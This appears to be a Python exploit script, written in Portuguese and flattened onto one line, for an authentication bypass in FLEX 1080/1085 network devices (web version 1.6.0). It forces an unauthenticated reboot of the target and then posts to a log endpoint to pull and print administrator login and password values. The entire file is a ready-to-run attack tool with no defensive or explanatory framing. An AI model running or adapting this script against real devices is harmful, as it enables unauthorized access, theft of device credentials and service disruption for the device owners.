#!/usr/bin/env python3 import requests import re import argparse from colorama import Fore import time def main(): def banner(): print(''' ________ _______ __ / ____/ / / ____/ |/ / / /_ / / / __/ | / / __/ / /___/ /___ / | /_/ /_____/_____//_/|_| [FLEX 1080/1085 Web 1.6.0 - Authentication Bypass] ''') def reboot(): r = requests.get(f'{arguments.url}/sistema/flash/reboot') if 'Rebooting' in r.text: pass else: print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}Ocorreu algum erro') quit() def extract_credentials(): r = requests.post(f'{arguments.url}/sistema/log.cgi', data={'force': '1'}) if 'user_param' in r.text: for line in r.text.split(): if re.search('login', line): print(f"{Fore.LIGHTGREEN_EX}[+]{Fore.LIGHTWHITE_EX} {line.replace('login:', 'login: ').replace(',', '')}") if re.search('pass', line): print(f"{Fore.LIGHTGREEN_EX}[+]{Fore.LIGHTWHITE_EX} {line.replace('pass:', 'pass: ')}") else: print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}Ocorreu algum erro') quit() banner() print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX}Inciando a exploração') time.sleep(1) print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX}Reiniciando o hardware') reboot() print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX}Aguardando 10 segundos') time.sleep(10) print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX}Hardware reiniciado com sucesso!') time.sleep(1) print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX}Tentando extrair as credenciais') extract_credentials() print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX}Credenciais extraidas com sucesso!') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u','--url', action='store', help='Target URL', dest='url', required=True) arguments = parser.parse_args() main()